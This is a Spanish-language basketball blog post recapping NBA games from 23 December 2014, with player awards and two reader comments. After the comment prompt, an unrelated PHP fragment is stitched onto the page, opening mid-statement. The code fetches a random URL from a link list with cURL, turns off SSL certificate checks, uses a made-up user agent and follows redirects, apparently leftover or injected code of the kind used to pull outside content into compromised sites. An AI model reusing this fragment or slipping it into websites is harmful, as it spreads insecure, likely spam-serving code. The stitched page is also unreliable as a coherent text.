La crónica: ¿Es un pájaro? ¿Es un avión?

23 de December de 2014 por MagicJohnson32

¡No, son los Hawks!

El Este se aprieta después de que los Bulls tumben a los Raptors y los Hawks -no nos cansamos de decirlo: ojo a los Hawks- ya apuntan a la primera plaza del Este. El Oeste, en cambio, pinta más dorado que ayer (¿pero menos que mañana?). La victoria de Golden State, junto a las derrotas de la mayoría de sus perseguidores, aumenta el margen de los de Kerr al frente de la conferencia.

Repasemos lo ocurrido.

Toronto Raptors 120 – Chicago Bulls 129

Se aprieta la cabeza del Este gracias a la victoria de los Bulls sobre los Raptors, un triunfo basado en la solidez de un Jimmy Butler que no hace más que consolidar su categoría All Star, y en el cuarto final firmado por los locales con Derrick Rose al mando. El aún líder de Conferencia dominó el encuentro durante cerca de tres cuartos y llegó a acumular una renta de 12 puntos (80-68). Valanciunas hizo sufrir a Gasol y Kyle Lowry, excelente una vez más, fue un martirio para los de Thibs, pero en la recta final el ataque de los Bulls hizo ‘click’ y los canadienses no encontraron la manera de frenar a Rose, infalible en el tramo decisivo. El parcial en el último periodo fue de 37-49, más propio de un Suns-Warriors 2006 que de un partido del Este. Y lo celebramos.

Atlanta Hawks 105 – Dallas Mavericks 102

Eso que los Raptors ven por el retrovisor, acercándose a velocidad de crucero, son los Hawks. El mejor equipo del último par de semanas de competición volvió a ofrecer sus credenciales en una plaza de postín y se llevó el triunfo del American Airlines Center con una superioridad que no quedó reflejada en el marcador final. Lo hizo de nuevo sin Jeff Teague pero con un Schroder soberbio, que no dejó pasar la oportunidad de lucirse ante su compatriota Nowitzki y el que asegura que es su ídolo, Rajon Rondo. El doble-doble del nuevo base de los Mavs no oculta ciertas deficiencias en el juego de los texanos, nada alarmante si tenemos en cuenta que apenas lleva unos días a las órdenes de Carlisle.

L.A. Clippers 118 – San Antonio Spurs 125

Necesitaban desesperadamente un triunfo los Spurs, perdedores de cuatro partidos consecutivos, dos de ellos después de tres prórrogas. El regreso de Tony Parker alivió a los de Popovich, que volvieron a mostrarse como una máquina ofensiva bien engrasada: 37 asistencias en sus 49 tiros anotados con un 64% de acierto. Pese a ello, los Clippers se mantuvieron en el partido hasta casi el final, y con 8 minutos por jugarse el marcador estaba empatado a 102. Esta vez los Spurs evitaron los sofocos de estos últimos partidos con un parcial de 13-4 y aseguraron una victoria necesaria para no empezar a mirar más hacia debajo, por donde llegan los Thunder y amenazan Pelicans y Suns, que hacia arriba.

Resto de la jornada

El banquete que se dio Harden a costa de los Blazers (95-110) encabeza el repaso al resto de la madrugada. The Beard sigue inconmensurable e incluso está aumentando sus prestaciones conforme avanza el curso. Cierto es que Portland se presentó en el Toyota Center de Houston sin su juego interior titular, pero en cualquier caso quedaron devorados por un Harden que ya está entre los favoritos para el MVP de la temporada. Los Rockets se sitúan así a un paso de Blazers y Grizzlies, que volvieron a perder (tercera derrota seguida) y esta vez ante un rival menor como los Jazz (97-91). Marc y Conley hicieron su parte pero las bajas de Allen y Randolph pesaron frente a la notable actuación de Hayward y Burks. Las derrotas de Grizzlies, Blazers, Clippers y Mavs fueron aprovechadas por los Warriors para abrir más brecha aun al frente del Oeste con un comodísimo triunfo sobre unos Kings que empiezan a perder la condición de equipo revelación (108-128). Cerramos con la paliza recibida por los Nuggets en Charlotte (82-110), que supone la tercera victoria seguida de los Hornets coincidiendo -vaya, qué casualidad- con la baja por lesión de Lance Stephenson.

PREMIOS

MVP: All Hail James Harden. 44 puntos, 7 asistencias, 5 robos, 3 rebotes y ninguna competencia por el máximo galardón del día.

Rookie: Buen día de PJ Hairston aprovechando los 21 minutos que tuvo. 10 puntos, 10 rebotes y 3 tapones para el novato de los Hornets.

Sorpresa: Los Mavs se han quedado sin rotación interior, así que a Carlisle no le queda otra que poner a Villanueva. Respondió bien el veterano jugador con 14 puntos, 6 rebotes y 2 robos en apenas 13 minutos. Otro que aprovechó los minutos fue McCollum, con 17 puntos, 3 rebotes, 3 asistencias y 3 robos para los Blazers.

Decepción: En 4 puntos se quedó Chandler Parsons, quien además apenas aportó y tuvo, como estadística más elevada, las 6 faltas que cometió en 29 minutos de juego.

Mayor esfuerzo en vano: Hasta los 34 puntos, con 6 rebotes y 3 asistencias, se disparó Kyle Lowry, quien como Jimmy Butler, debería ser reconocido este año para disputar su primer All Star Game.

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    No sé si favorecido por calendario,aunque Utah está yendo a más por fin,pero Jazz,76ers y Nuggets no parecen un gran baremo para medir las 3 W de Hornets.De todas formas seguro que a nivel sensaciones se nota la ausencia de Lance,posiblemente se vea a un Kemba más alegre asumiendo más protagonismo o habrá otras señales,no lo sé, porque no he visto esos partidos.Y mientras llega esa racha positiva la criatura haciendo guiños a Brooklyn en su cuenta de Instagram.

    http://www.netsdaily.com/2014/12/22/7433183/whats-lance-stephenson-trying-to-tell-us

      Citar

  2. franitis dice:
    #2

    Qué vergüenza de primer cuarto en el C’s VS Magic… No metían una los Celtics… Menos mal que lo apañaron en el último cuarto.

    He leído una propuesta sobre Thomas/Plumlee por Bradley/Wright, en un trade entre Celtics y Suns… No sé qué decirte, a pesar de perder a Bradley, Isiah Thomas me parece más jugador. Yo me tiraba a la piscina.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>